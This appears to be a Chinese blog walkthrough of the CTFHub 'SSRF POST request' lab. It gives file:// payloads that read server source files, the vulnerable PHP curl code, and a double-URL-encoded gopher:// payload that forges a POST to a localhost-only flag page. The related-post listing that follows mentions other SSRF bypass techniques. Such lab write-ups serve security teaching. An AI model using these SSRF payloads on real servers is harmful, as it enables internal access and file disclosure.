CTFHub技能树 Web-SSRF POST请求

最新推荐文章于 2024-07-24 21:42:00 发布
最新推荐文章于 2024-07-24 21:42:00 发布
阅读量2.8k 收藏 18
点赞数 9
分类专栏: CTFHub WEB Writeup 文章标签: CTFHub技能树 CTF writeup SSRF Gopher协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/118387034
版权

POST请求

hint:这次是发一个HTTP POST请求,对了,ssrf是用php的curl实现的,并且会跟踪302跳转,加油吧骚年。

启动环境,访问页面为空白,查看URL:

http://challenge-d01ce204edb10174.sandbox.ctfhub.com:10800/?url=_

通过 GET 传参直接拼接上127.0.0.1/flag.php,访问后得到一个输入框:
在这里插入图片描述
查看源码:

<form action="/flag.php" method="post">
	<input type="text" name="key">
	<!-- Debug: key=51457bb0a50c1eb2c92dcc3ec3c2cc13-->
</form>

得到key值,输入后:
在这里插入图片描述
提示只允许从127.0.0.1访问,尝试通过file协议读取index.php以及flag.php页面的源码,构造如下 Payload:

?url=file:///var/www/html/index.php
?url=file:///var/www/html/flag.php

得到index.php页面源码如下:

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
    exit;
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

得到flag.php页面源码如下:

<?php

error_reporting(0);

if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
    echo "Just View From 127.0.0.1";
    return;
}

$flag=getenv("CTFHUB");
$key = md5($flag);

if (isset($_POST["key"]) && $_POST["key"] == $key) {
    echo $flag;
    exit;
}
?>

<form action="/flag.php" method="post">
	<input type="text" name="key">
	<!-- Debug: key=<?php echo $key;?>-->
</form>

尝试使用 Gopher 协议向服务器发送 POST 包
首先构造 Gopher协议所需的 POST请求:

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

key=51457bb0a50c1eb2c92dcc3ec3c2cc13

:在使用 Gopher协议发送 POST请求包时,HostContent-TypeContent-Length请求头是必不可少的,但在 GET请求中可以没有。

在向服务器发送请求时,首先浏览器会进行一次 URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次 URL解码。

所以我们需要对构造的请求包进行两次 URL编码:
将构造好的请求包进行第一次 URL编码:
在这里插入图片描述

:在第一次编码后的数据中,将%0A全部替换为%0D%0A。因为 Gopher协议包含的请求数据包中,可能包含有=&等特殊字符,避免与服务器解析传入的参数键值对混淆,所以对数据包进行 URL编码,这样服务端会把%后的字节当做普通字节。

再进行第二次 URL编码得到如下 Gopher请求内容:

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253D51457bb0a50c1eb2c92dcc3ec3c2cc13

因为flag.php中的$_SERVER["REMOTE_ADDR"]无法绕过,只能通过index.php页面中的curl功能向目标发送 POST请求,构造如下Payload:

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253D51457bb0a50c1eb2c92dcc3ec3c2cc13

向目标发送请求,得到 flag:
在这里插入图片描述

Senimo_
关注
  • 9
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
CTFHUBSSRF绕过方法之靶场实践(二)
Continuejww的博客
09-29 396
SSRF POST请求等几种绕过方式演练
CTF-WEB入门DOC-2019版1
08-03
2. 靶场:如BUUOJ、南邮0xCTFCTF.show、CTFhub、BugKuCTF、攻防世界等,提供实践环境。 3. 学习平台:CTF-Wiki-Web、dalao们的博客、先知社区、freebuf、安全客等。 4. 书籍:《白帽子讲Web安全》、《Web安全攻防...
CTFHUB-SSRF-POST请求
weixin_68416970的博客
06-22 449
CTFHUB靶场技能树-SSRF-POST请求的通关教程
CTFHub技能树 Web-SSRF 302跳转 Bypass
Senimo
07-05 3460
CTFHub技能树 Web-SSRF 302跳转 Bypass hint:SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧 启动环境,依然为空白界面,查看URL: http://challenge-722b117ccdc24f8e.sandbox.ctfhub.com:10800/?url=_ 其中有通过GET传参的url,尝试访问127.0.0.1/flag.php页面: 提示:不允许企业内部IP访问,使用file协议
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 1035
CTFHub技能树-web-ssrf
CTFHub技能树 Web-SSRF 上传文件
Senimo
07-04 1814
CTFHub技能树 Web-SSRF 上传文件 hint:这次需要上传一个文件到flag.php了,祝你好运 启动环境,依然为空白页面,查看URL: http://challenge-30455822aa791779.sandbox.ctfhub.com:10800/?url=_ 其通过 GET 方式传递了参数url,依照之前题目,尝试访问?url=127.0.0.1/flag.php: 提示需要上传 Webshell,只有选择文件功能,并没有提交按钮。 使用file协议读取flag.php的源码: ?
CTFHub技能树 Web-SSRF篇(保姆级通过教程)
weixin_45808483的博客
11-10 5361
第一部分(Http、Dict和file等协议的利用) 内网访问 尝试访问位于127.0.0.1的flag.php吧 我们是从目标主机内网环境访问它本地的flag.php,我们构建url: /?url=http://127.0.0.1/flag.php 图中我们可以看出访问成功了。 为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们尝试直接访问,发现访问不到。 既然是伪协议访问,我们先了解一下url伪协议: 类型 file:/// dict..
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 8182
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2262
ssrf
CTFHUB技能树——SSRF(一)
2401_82985722的博客
05-21 1294
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议
CTFHub技能树 Web-SSRF系列通过全技巧(已完结)
最新发布
m0_59151303的博客
07-24 1105
第二步:选择一个文件上传,点击提交查询并用Burp Suite抓包,修改包内容,右击发送到Reperter,打开重放器,发现有中文乱码,修改中文乱码为“提交“,点击发送,发现Content-Length:的长度改变。第三步:用在线工具对修改后包进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。第三步:用在线工具进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
CTFHub技能树 Web-信息泄露 vim缓存
Senimo
12-22 2135
CTFHub技能树 Web-信息泄露 vim缓存 hit:当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存会一直留在服务器上,引起网站源码泄露。 启动环境: 提示了flag在index.php页面的源码中,并提示了是vim缓存漏洞 访问/.index.php.swp,下载index.php的swp文件: 使用vim恢复.swp文件: vim -r index.php.swp 恢复swp文件后,得到源码: flag在源码中。 ...
CTFHub技能树 Web-信息泄露 HG泄露
Senimo
12-22 1914
CTFHub技能树 Web-信息泄露 HG泄露 hit:当开发人员使用 Mercurial 进行版本控制,对站点自动部署。如果配置不当,可能会将.hg 文件夹直接部署到线上环境。这就引起了 hg 泄露漏洞。 启动环境: 其提示了为Mercurial的信息泄露,也就是/.hg泄露 提示flag在服务器端就版本中 有了SVN泄露的经验,直接使用dvcs-ripper下载.hg文件: ./rip-hg.pl -v -u http://xxx.com/.hg 打开.hg文件夹: 查看到其中有last-mes
CTFHub技能树 Web-SSRF DNS重绑定 Bypass
Senimo
07-05 1872
CTFHub技能树 Web-SSRF DNS重绑定 Bypass hint:关键词:DNS重绑定。剩下的自己来吧,也许附件中的链接能有些帮助 启动环境,打开题目为空白,查看URL: http://challenge-cafd9f03daa84720.sandbox.ctfhub.com:10800/?url=_ 与之前一样的形式,查看?url=127.0.0.1/flag.php: 提示不允许企业内部IP访问,尝试使用file协议读取源码:?url=file:///var/www/html/index.
ctfhub web技能树302跳转
07-28
CTFHubWeb技能树中,302跳转是一种常见的技术。根据引用\[1\],302跳转继承了HTTP 1.0中302的实现,即无论原请求是GET还是POST,都可以自动进行重定向。而根据引用\[2\],在使用curl命令进行下载时,可以通过参数-C -实现断点续传,即在下载过程中按Ctrl + C停止下载,下次可以接着上次的进度继续下载。这样可以节省时间,避免重复下载已经下载过的部分。 在某些情况下,302跳转可能会受到黑名单的限制。根据引用\[3\],黑名单可能限制了特定的网段,如127、172、10、192网段。然而,可以通过使用localhost的方式绕过这些限制。例如,将http://127.0.0.1/flag.php转换为短网址,并构造Payload发送请求,利用302跳转可以获取到flag。 总结来说,302跳转是一种常见的Web技术,可以用于重定向请求。在CTFHubWeb技能树中,了解如何使用302跳转以及如何绕过黑名单限制是很重要的。 #### 引用[.reference_title] - *1* *2* [2.CTFhub技能树 web前置技能 http协议 302跳转](https://blog.csdn.net/FFFFFFMVPhat/article/details/121342556)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树 Web-SSRF 302跳转 Bypass](https://blog.csdn.net/weixin_44037296/article/details/118482943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值